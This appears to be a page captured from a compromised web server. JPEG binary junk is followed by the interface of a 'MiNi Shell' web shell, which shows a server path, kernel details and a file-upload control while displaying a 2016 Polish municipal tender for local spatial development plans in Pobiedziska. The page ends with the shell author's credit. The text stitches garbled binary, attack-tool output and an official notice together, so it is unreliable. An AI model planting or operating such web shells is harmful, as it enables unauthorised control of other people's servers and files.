JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160609/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160609/77275-N-2016.html

<p class="kh_header"><b>Pobiedziska: Opracowanie projektów miejscowych planów zagospodarowania przestrzennego na terenie Gminy Pobiedziska</b><br>
<b>Numer ogłoszenia: 77275 - 2016; data zamieszczenia: 09.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pobiedziska , ul. Tadeusza Kościuszki 4, 62-010 Pobiedziska, woj. wielkopolskie, tel. 061 8977100, faks 061 8977124.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pobiedziska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie projektów miejscowych planów zagospodarowania przestrzennego na terenie Gminy Pobiedziska.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest opracowanie projektów miejscowych planów zagospodarowania przestrzennego Gminy Pobiedziska, na podstawie Uchwał Rady Miejskiej Gminy Pobiedziska.
2.	Na przygotowany projekt planu zagospodarowania przestrzennego składać się będą:
a)	projekt tekstu planu miejscowego (tekst uchwały) wraz z uzasadnieniem;
b)	projekt załącznika graficznego do uchwały (rysunek planu stanowiący zał. nr 1 do uchwały);
c)	projekt rozstrzygnięcia uwag złożonych do wyłożonego do publicznego wglądu projektu planu miejscowego (stanowiący zał. nr 2 do uchwały);
d)	projekt rozstrzygnięcia o sposobie realizacji zapisanych w planie inwestycji z zakresu infrastruktury technicznej, które należą do zadań własnych gminy oraz zasadach ich finansowania, zgodnie z przepisami o finansach publicznych (stanowiący zał. nr 3 do uchwały);
e)	prognoza oddziaływania na środowisko do projektu planu miejscowego;
f)	prognoza skutków finansowych uchwalenia planu miejscowego.

3.	Projekt planu miejscowego winien być przygotowany zgodnie z zasadami wiedzy zawodowej i zgodnie z obowiązującymi przepisami prawa, w szczególności z ustawą z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (t.j. Dz. U. z 2015 r., poz. 199 ze zm.) oraz rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. z 2003 r., Nr 164, poz. 1587 ze zm). 
4.	Przygotowanie projektu planu miejscowego poprzedzone będzie przygotowaniem przez Wykonawcę map pomocniczych na podkładach cyfrowych map ewidencyjnych (lub tam gdzie są dostępne - zasadniczych). 
5.	Na mapy pomocnicze określone w punkcie 4 składać się będą:
1)	mapa ze strukturą własności nieruchomości na obszarze opracowania planu miejscowego z wyszczególnieniem terenów należących m.in. do: osób fizycznych, Skarbu Państwa, Gminy Pobiedziska, spółek prawa handlowego wraz z oznaczeniem terenów oddanych w użytkowanie wieczyste lub trwały zarząd w skali 1:5000 lub większej (ostateczną skalę ustali Zamawiający w porozumieniu z wykonawcą );
2)	mapa ze strukturą użytkowania gruntów objętych opracowaniem planu miejscowego z wyszczególnieniem obszarów: gruntów leśnych, gruntów zadrzewionych, łąk, pastwisk i nieużytków, użytków rolnych klas bonitacyjnych I-III, użytków rolnych klas bonitacyjnych IV-VI, wód i rowów melioracyjnych, gruntów budowlanych, gruntów ornych pod budynkami wchodzącymi w skład gospodarstw rolnych, terenów dróg, terenów innych w skali 1:5000 lub większej (ostateczną skalę ustali Zamawiający w porozumieniu z wykonawcą );
3)	mapa z wyszczególnieniem funkcji jakie znajdują się na obszarze opracowania planu miejscowego m.in.: terenów zabudowy mieszkaniowej jednorodzinnej, terenów zabudowy wielorodzinnej, terenów zabudowy mieszkaniowo - usługowej, terenów zabudowy usługowej, terenów obiektów produkcyjnych, składów i magazynów, terenów zieleni nieurządzonej, terenów rolniczych, terenów lasów w skali 1:5000 lub większej (ostateczną skalę ustali Zamawiający w porozumieniu z wykonawcą );
4)	mapa z podkładem Studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Pobiedziska w skali 1:5000 lub większej (ostateczną skalę ustali Zamawiający w porozumieniu z wykonawcą );
5)	mapa z podkładem nieobowiązującego miejscowego planu ogólnego zagospodarowania przestrzennego Gminy Pobiedziska z 1992 r. w skali 1:5000 lub większej (ostateczną skalę ustali Zamawiający w porozumieniu z wykonawcą );
6)	mapa z wydanymi decyzjami o warunkach zabudowy oraz decyzjami o ustaleniu lokalizacji inwestycji celu publicznego na obszarze opracowania planu miejscowego, jeśli decyzje zostały wydane na obszarze opracowania, w skali 1:5000.
6.	Podkłady map ewidencyjnych lub map zasadniczych do sporządzenia map pomocniczych zostaną udostępnione przez Zamawiającego w wersji map cyfrowych ( mapa ewidencyjna z nadaną georeferencją lub baza danych mapy zasadniczej w postaci pliku *.shp).
7.	Zamawiający udostępni wypisy z rejestru gruntów do sporządzenia map pomocniczych. Wykonawca będzie zobowiązany do należytego zabezpieczenia danych zawartych w wypisach z rejestru gruntów.
8.	Przygotowanie projektu planu miejscowego poprzedzone będzie inwentaryzacją terenu sporządzoną przez Wykonawcę objętego opracowaniem planu miejscowego wraz ze sporządzeniem dokumentacji fotograficznej zabudowy znajdującej się na obszarze opracowania i wypełnieniem tabeli do inwentaryzacji (tabela w załączniku).
9.	Wykonawca na podstawie przygotowanych map pomocniczych i inwentaryzacji terenu przedstawi nieruchomości (działki), które należy wyłączyć z opracowania planu miejscowego ze względu na niezgodność ze Studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Pobiedziska, wydane decyzje o warunkach zabudowy lub nieobowiązujący ogólny plan zagospodarowania przestrzennego.
10.	Do obowiązków Wykonawcy należeć będzie również przygotowanie wzorów pism przewodnich wraz z rozdzielnikiem , a także ogłoszeń i obwieszczeń do przystąpienia do sporządzania planu miejscowego oraz przekazania projektu planu miejscowego do uzgodnień i opiniowania.
11.	Wykonawca zobowiązany będzie do przygotowania wykazów: wniosków, uzgodnień, opinii, uwag złożonych do procedury projektu planu miejscowego wraz z projektem ich rozstrzygnięcia. Materiały (wnioski, uzgodnienia, opinie i uwagi) do przygotowania wykazów zostaną przekazane Wykonawcy przez Zamawiającego drogą elektroniczną w formacie plików *.pdf.
12.	Wykonawca zobowiązany będzie do uczestniczenia w posiedzeniach Gminnej Komisji Architektoniczno-Urbanistycznej działającej przy Burmistrzu Miasta i Gminy Pobiedziska, każdorazowo podczas dyskusji publicznych nad przyjętymi rozwiązaniami w projekcie planu miejscowego, a także podczas podejmowania rozstrzygnięcia złożonych wniosków i uwag do procedury planu miejscowego.
13.	Wykonawca zobowiązany będzie do przygotowania kompletu dokumentów w celu przeprowadzenia procedury zmiany przeznaczenia terenów rolnych na cele nierolnicze oraz terenów leśnych na cele nieleśne, jeżeli będzie to wynikało z przygotowanego projektu miejscowego planu zagospodarowania przestrzennego.
14.	Do obowiązków wykonawcy należeć będzie również przygotowanie kompletu dokumentów, po podjęciu przez Radę Miejską Gminy Pobiedziska uchwały w sprawie uchwalenia planu miejscowego lub jego części, w celu przekazania procedury do Wojewody Wielkopolskiego celem sprawdzenia jej z przepisami prawa..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 200.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże się, że w ostatnich trzech latach przez upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej dwóch uchwalonego obowiązującego miejscowego planu zagospodarowania przestrzennego  o powierzchni: 
a) Zadanie nr  1 - minimum 2 ha
b) Zadanie nr 2 - minimum 60 ha
c) w przypadku składania oferty na oba zadania - 60 ha.
Dowodem realizacji wskazanych w wykazie planów będzie poświadczenie wraz z danymi dotyczącymi daty publikacji wykonanego miejscowego planu zagospodarowania przestrzennego (oraz nr Dziennika Urzędowego).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tj. wymagane jest wykazanie przez Wykonawcę dysponowania minimum 2 osobowym zespołem projektowym (w tym 1 osoba do pełnienia funkcji głównego projektanta planu), które będą uczestniczyć w wykonaniu zamówienia posiadające uprawnienia do wykonywania określonej działalności lub czynności zgodnie z art. 5 ustawy z dnia 27 marca 2003 roku o planowaniu i zagospodarowaniu przestrzennym (tj. Dz.U. z 2015, poz. 199 ze zm.) Każda ze wskazanych osób musi mieć minimum 3 letnie doświadczenie w opracowywaniu miejscowych planów zagospodarowania przestrzennego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Upoważnienie do podpisania oferty podpisane przez osobę lub osoby figurujące w rejestrze handlowym jako posiadające uprawnienia do podpisywania zobowiązań w imieniu Oferenta w przypadku podpisania oferty przez osobę nieupoważnioną; 
b)	Oświadczenie na podstawie art. 22 ustawy pzp.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - czas opracowania - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wzór umowy jest załącznikiem do niniejszego SIWZ.
2.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy.
3.	Dopuszcza się możliwość zmiany terminu wykonania przedmiotu umowy (w tym także realizacji poszczególnych etapów zamówienia), o którym mowa w § 1 , § 4 oraz § 7 umowy w przypadku niedotrzymania przez Zamawiającego ustaleń opisanych w treści § 3 umowy lub zaistnienia obiektywnych okoliczności niezależnych od Zamawiającego lub Wykonawcy, skutkujących czasowym przerwaniem prac lub wydłużeniem procedury formalno-prawnej spowodowaną np. rozstrzygnięciami wniesionych do projektu planu uwag, podjęcie przez Radę Miejską Gminy Pobiedziska uchwał o stwierdzeniu konieczności dokonania zmian w projekcie planu, a także zmian w obowiązujących przepisach prawa.
4.	Zmiana terminu z przyczyn opisanych w ust. 3 niniejszego paragrafu wymaga odrębnych ustaleń Zamawiającego i Wykonawcy dokonanych w formie pisemnej pod rygorem nieważności.
5.	Wykonawca ma prawo domagać się od Zamawiającego zmiany terminu wykonania przedmiotu niniejszej umowy, jeżeli na skutek zmiany przepisów prawa, dotyczących trybu i sposobu opracowania projektu planu będzie wymagane sporządzenie dodatkowych dokumentów, niezbędnych do uchwalenia projektu planu.
6.	W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia niniejszej umowy, Zamawiający może odstąpić od umowy w terminie miesiąca od powzięcia wiadomości o powyższych okolicznościach. W razie odstąpienia od umowy Wykonawcy przysługuje wynagrodzenie tylko za wykonany i odebrany przez Zamawiającego etap przedmiotu umowy. 
7.	W wypadku pojawienia się konieczności ponownego wyłożenia projektu planu termin realizacji umowy może zostać przedłużony o czas wyłożenia, co wymaga sporządzenia przez strony aneksu do umowy.
8.	Wykonawca ma prawo zmiany lub rezygnacji z podwykonawców. Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powołał się na zasadach określonych w ustawie Prawo zamówień publicznych, Wykonawca jest zobowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie posiada zasoby w stopniu nie mniejszym niż wymagane w trakcie postępowania o udzielenie zamówienia.
9.	Zmiana osób wyznaczonych przez Wykonawcę w ofercie, w trakcie realizacji umowy musi być uzasadniona przez Wykonawcę na piśmie i wymaga zaakceptowania, w formie pisemnej, przez Zamawiającego, przy czym Zamawiający zaakceptuje zmianę taką wyłącznie wtedy, gdy kwalifikacje i doświadczenie proponowanych osób będą nie gorsze niż wymagane postanowieniami specyfikacji istotnych warunków zamówienia dotyczących postępowania przetargowego w wyniku którego zawarto niniejszą umowę.
10.	Zamawiający przewiduje zmianę innych postanowień umowy w przypadku zmiany stawek podatku od towarów i usług.
11.	Zmiany umowy mogą być dokonane wyłącznie w formie pisemnego aneksu do umowy pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pobiedziska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Pobiedziska
ul. Kościuszki 4
62-010 Pobiedziska.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2016 godzina 12:00, miejsce: Gmina Pobiedziska
ul. Kościuszki 4
62-010 Pobiedziska
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie miejscowego planu zagospodarowania przestrzennego w rejonie ul. Spokojnej Leśnej i Sosnowej w Jerzykowie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie należy dokonać na podstawie uchwały Rady Miejskiej Gminy Pobiedziska nr XIX/153/2015 z dnia 26 listopada 2015 r. Obszar opracowania ca 2,0255 ha..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 200.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. czas opracowania - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie dwóch zmian miejscowych planów zagospodarowania  przestrzennego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Projekt częściowej zmiany miejscowego planu zagospodarowania przestrzennego północnej części miasta Pobiedziska pomiędzy Skansenem Miniatur a ulicą Główną w Pobiedziskach oraz części obrębu główna, gmina Pobiedziska. Opracowanie należy dokonać na podstawie Uchwały Rady Miejskiej Gminy Pobiedziska nr XVI/114/2015 z dnia  24 września  2015 r. Opszar opracowania ca. 18,22 ha.
2. Projekt zmiany miejscowego planu zagospodarowania przestrzennego terenu usług w rejonie ulic: Fabryczna, Długa, Rolna, Gajowa w Pobiedziskach. Opracowanie należy dokonać na podstawie Uchwały Rady Miejskiej Gminy Pobiedziska nr XIV/98/2015 z dnia 25 sierpnia 2015r. - obszar opracowania ca. 45,04 ha.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 200.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. czas opracowania - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com